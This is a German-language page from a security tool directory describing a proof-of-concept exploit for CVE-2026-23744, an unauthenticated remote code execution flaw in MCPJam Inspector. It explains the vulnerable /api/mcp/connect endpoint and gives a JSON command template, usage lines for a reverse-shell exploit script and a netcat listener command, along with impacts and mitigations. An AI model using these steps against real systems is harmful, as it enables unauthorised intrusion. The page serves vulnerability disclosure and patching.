Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-23744 — Proof-of-Concept-Exploit für CVE-2026-23744, eine nicht authentifizierte RCE in MCPJam Inspector. Bietet Reverse Shell und Befehlsausführung über einen angreifbaren API-Endpunkt. | Kitploit
Tools/GitHubGitHub/rohit-sundar/cve-2026-23744
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-ToolLabs & Praxis
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

Proof-of-Concept-Exploit für CVE-2026-23744, eine nicht authentifizierte RCE in MCPJam Inspector. Bietet Reverse Shell und Befehlsausführung über einen angreifbaren API-Endpunkt.

vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2026-23744 – MCPJam Inspector Unangemeldete Remote-Codeausführung (RCE)

Beschreibung

  • Produkt: MCPJam Inspector
  • Betroffene Versionen: ≤ 1.4.2
  • Behobene Version: 1.4.3
  • Typ: Unangemeldete Remote-Codeausführung (RCE)
  • Angriffsvektor: Netzwerk
  • Erforderliche Authentifizierung: Nein
  • Erforderliche Benutzerinteraktion: Nein
  • CVSS v3.1: 9.8 (Kritisch)

CVE-2026-23744 ist eine kritische unangemeldete Remote-Codeausführung (RCE)-Schwachstelle, die MCPJam Inspector ≤ 1.4.2 betrifft. Das Problem entsteht, weil der Inspector einen Management-Endpoint (/api/mcp/connect) bereitstellt, der eine benutzergesteuerte MCP-Serverkonfiguration akzeptiert und ohne ausreichende Authentifizierung oder Sicherheitseinschränkungen eine Prozessausführung auslösen kann. Betroffene Versionen lauschen standardmäßig auf 0.0.0.0 (allen Schnittstellen) anstatt auf localhost, was eine Remote-Ausnutzung ermöglicht, sofern der Dienst netzwerkerreichbar ist.

Technische Details

Die Schwachstelle ist mit dem folgenden Endpoint verbunden:

root@kitploit:~
POST /api/mcp/connect

Der Endpoint akzeptiert ein JSON-Objekt mit einer Serverkonfiguration, z.B.:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

Diese bereitgestellte Konfiguration wird dann von MCPJam Inspector verwendet, um einen neuen MCP-Serverprozess zu erstellen und zu verwalten. Da der Endpoint keine ausreichende Authentifizierung und Sicherheitskontrollen besitzt, kann ein Angreifer beliebige Prozessdefinitionen einreichen, die vom Inspector-Dienst ausgeführt werden.

Im Kern handelt es sich um eine Fehlende Authentifizierung für kritische Funktion (CWE-306)-Schwachstelle, bei der die Anwendung Funktionalität, die für vertrauenswürdige lokale Benutzer vorgesehen ist, über das Netzwerk ohne ausreichende Sicherheitsprüfungen zugänglich macht.

Grundursache

Die Schwachstelle entsteht durch zwei Designfehler:

  1. Unangemeldeter Zugriff auf Prozessverwaltung
  • Die API erlaubt Benutzern zu definieren, wie MCP-Server gestartet werden.
  • Kritische Funktionalität ist ohne Authentifizierung zugänglich.
  • Vom Benutzer gesteuerte Prozessparameter werden von der Anwendung ohne weitere Validierung als vertrauenswürdig angesehen.
  1. Unsicherer Standard-Exposure
  • MCPJam Inspector lauscht standardmäßig auf 0.0.0.0.
  • Die Management-API ist von anderen Systemen im Netzwerk erreichbar.
  • Angreifer können direkt mit der Prozesserstellungsfunktion interagieren.

Der resultierende Angriffspfad kann wie folgt visualisiert werden:

root@kitploit:~
Angreifer → /api/mcp/connect → Prozesserstellung → Betriebssystem

Da die Anwendung direkt mit der Betriebssystem-Prozesserstellung interagiert, kann eine erfolgreiche Ausnutzung zu beliebiger Befehlsausführung im Sicherheitskontext des MCPJam Inspector-Dienstes führen.

Verwendung

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (oder) --target: Ziel-URL oder Ziel-IP-Adresse.
  • -tport (oder) --target-port: Zielport für die Verbindung; in den meisten Fällen 6274 für MCPJam Inspector. Verwenden Sie dieses Argument nicht, wenn MCPJam Inspector an anderer Stelle gehostet wird, z.B. in einer Subdomain oder einem virtuellen Host. Geben Sie stattdessen die Subdomain oder den virtuellen Host mit dem Argument -t an.
  • -lhost (oder) --local-host: Öffentliche IP-Adresse für die Reverse-Shell, zu der zurückverbunden werden soll.
  • -lport (oder) --local-port: Port, der für die Reverse-Shell verwendet werden soll.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (oder) --command: Befehl, der auf dem Ziel ausgeführt werden soll.

Vor der Verwendung dieses Programms müssen Sie zuerst einen Listener auf Ihrem lokalen Rechner mit Netcat starten.

Dazu verwenden Sie den folgenden Befehl:

root@kitploit:~
nc -lvnp <port>

Führen Sie dann den obigen Befehl aus, um eine Reverse-Shell auf dem Ziel zu erhalten.

Auswirkungen

Eine erfolgreiche Ausnutzung kann einem Angreifer Folgendes ermöglichen:

  • Ausführen beliebiger Befehle auf dem Zielhost,
  • Lesen oder Ändern sensibler Dateien,
  • Installieren von Persistenzmechanismen,
  • Bereitstellen zusätzlicher Schadsoftware oder Tools,
  • Weiterleitung zu anderen Systemen innerhalb der Umgebung,
  • Möglicherweise vollständige Systemkompromittierung, abhängig von den Dienstberechtigungen.

Der Schwachstelle wurde ein CVSS v3.1-Score von 9.8 (Kritisch) zugewiesen, aufgrund des netzwerkbasierten Angriffsvektors, fehlender Authentifizierung, fehlender Benutzerinteraktion und hohen Auswirkungen auf Vertraulichkeit, Integrität und Verfügbarkeit.

Abhilfe

Aktualisieren Sie sofort auf MCPJam Inspector 1.4.3 oder höher. Zusätzliche Schutzmaßnahmen umfassen:

  • Einschränken des Zugriffs auf die Inspector-Oberfläche,
  • Binden von Diensten nach Möglichkeit an localhost,
  • Begrenzung der Exposition durch Firewall-Regeln,
  • Ausführen des Dienstes mit minimal erforderlichen Berechtigungen,
  • Überwachen auf unbefugte Zugriffsversuche.

Haftungsausschluss

Dieser PoC dient ausschließlich zu Bildungszwecken, defensiver Sicherheitsforschung und autorisierten Sicherheitstests. Er sollte nur gegen Systeme mit ausdrücklicher Genehmigung verwendet werden. Die unbefugte Nutzung gegen Drittsysteme kann gegen geltende Gesetze und Vorschriften verstoßen. Der Eigentümer dieses Repositoriums ist nicht verantwortlich für Schäden, die durch die Nutzung dieses Programms entstehen.

Quellen

  1. MITRE CVE Record – CVE-2026-23744
  2. NIST National Vulnerability Database (NVD) – CVE-2026-23744
  3. GitHub Security Advisory (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Vulnerability Lookup
  5. CVE-2026-23744: Critical RCE in MCPJam Inspector Targeting Developers – CrowdSec
  6. CVE-2026-23744: MCPJam Inspector RCE Vulnerability – SentinelOne
Tool herunterladen